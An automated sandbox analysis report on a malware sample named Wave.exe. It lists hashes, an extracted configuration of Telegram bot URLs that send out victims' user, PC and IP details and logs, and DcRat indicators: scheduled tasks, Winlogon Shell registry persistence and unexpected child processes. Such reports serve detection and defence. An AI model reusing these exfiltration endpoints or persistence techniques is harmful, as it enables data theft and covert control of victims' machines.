Analysis
-
max time kernel
600s -
max time network
599s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
04-07-2024 18:48
General
-
Target
Wave.exe
-
Size
8.7MB
-
MD5
658cf2d0529f97f6f04bb78b151dc207
-
SHA1
4af0fb55a3343f885f43af09bd11f235dcfded2d
-
SHA256
85edeebdb49bff8eede6ecc42928d9b0f6d120b0e4a3a88fe59c9b7cb62b2cac
-
SHA512
d2361c08291037d177cbe8b546cb65fbfc5361fe676114919edc69bbecc90b31dd37ef9ef41ceab00b560ee26e264eaa702eeb32bb9ff5659767a2c41b9a7dce
-
SSDEEP
196608:WCpTIWsrEhW5hcePglVrOUv5JpkMZxShCZxD43eQpMqX:Wg89rEShcWgldrjwcZxD4OQeqX
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%E2%80%A2%20Comment%3A%20proliv%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20WQMJVIBL%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CmswebFonthost%5Cbrowserwinsvc.ex
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A28.908646
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A08.533138
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 4476 schtasks.exe 1860 schtasks.exe 1148 schtasks.exe 180 schtasks.exe 1552 schtasks.exe 448 schtasks.exe 2784 schtasks.exe 3196 schtasks.exe 1552 schtasks.exe 1652 schtasks.exe 3104 schtasks.exe 1128 schtasks.exe 2972 schtasks.exe 4864 schtasks.exe 1068 schtasks.exe 3116 schtasks.exe 2208 schtasks.exe 1712 schtasks.exe 3332 schtasks.exe 4432 schtasks.exe 4168 schtasks.exe 3060 schtasks.exe 3192 schtasks.exe 976 schtasks.exe 3160 schtasks.exe 4448 schtasks.exe 4204 schtasks.exe 1892 schtasks.exe 1648 schtasks.exe 2792 schtasks.exe 2608 schtasks.exe 4516 schtasks.exe 3664 schtasks.exe 872 schtasks.exe 4920 schtasks.exe 3164 schtasks.exe 4560 schtasks.exe 4876 schtasks.exe 4972 schtasks.exe 4672 schtasks.exe 4960 schtasks.exe 2128 schtasks.exe 3180 schtasks.exe 1892 schtasks.exe 3828 schtasks.exe 1640 schtasks.exe 2984 schtasks.exe 1816 schtasks.exe 2128 schtasks.exe 728 schtasks.exe 808 schtasks.exe 4320 schtasks.exe 2156 schtasks.exe 1512 schtasks.exe 3056 schtasks.exe 1724 schtasks.exe 2784 schtasks.exe 452 schtasks.exe 4792 schtasks.exe 800 schtasks.exe 3880 schtasks.exe 3504 schtasks.exe 4464 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation Wave.exe -
Modifies WinLogon for persistence 2 TTPs 23 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Neo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\"" Neo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\", \"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\", \"C:\\SolaraTab\\msedge.exe\", \"C:\\Users\\Default\\Desktop\\Idle.exe\", \"C:\\Users\\Default\\Local Settings\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\", \"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\", \"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\", \"C:\\SolaraTab\\msedge.exe\", \"C:\\Users\\Default\\Desktop\\Idle.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\"" MsPortserver.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\", \"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\mswebFonthost\\Neo.exe\", \"C:\\providerWebFont\\services.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\explorer.exe\", \"C:\\Program Files\\Microsoft Office 15\\unsecapp.exe\", \"C:\\mswebFonthost\\csrss.exe\", \"C:\\Windows\\Logs\\WindowsUpdate\\smss.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\WaveInstaller.exe\", \"C:\\SolaraTab\\msedge.exe\"" RuntimeBroker.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\"" browserwinsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\System.exe\", \"C:\\Windows\\appcompat\\Programs\\RuntimeBroker.exe\", \"C:\\providerWebFont\\fontdrvhost.exe\", \"C:\\mswebFonthost\\wininit.exe\", \"C:\\mswebFonthost\\dllhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\browserwinsvc.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\mswebFonthost\\browserwinsvc.exe\", \"C:\\mswebFonthost\\wscript.exe\", \"C:\\mswebFonthost\\fontdrvhost.exe\", \"C:\\Users\\Admin\\AppData\\Local\\SearchApp.exe\", \"C:\\providerWebFont\\MsPortserver.exe\"" MsPortserver.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 872 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3828 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1648 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3504 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1892 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4972 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1640 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1816 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1080 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2128 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3180 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 452 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1128 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3056 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 800 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2984 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5060 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4792 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1068 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4320 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4960 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3060 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3880 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3196 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2972 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4864 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3664 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 728 1784 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2208 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4920 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1444 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4868 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 808 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 976 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2792 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1948 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3164 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4432 2244 schtasks.exe 270 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4168 2244 schtasks.exe 270 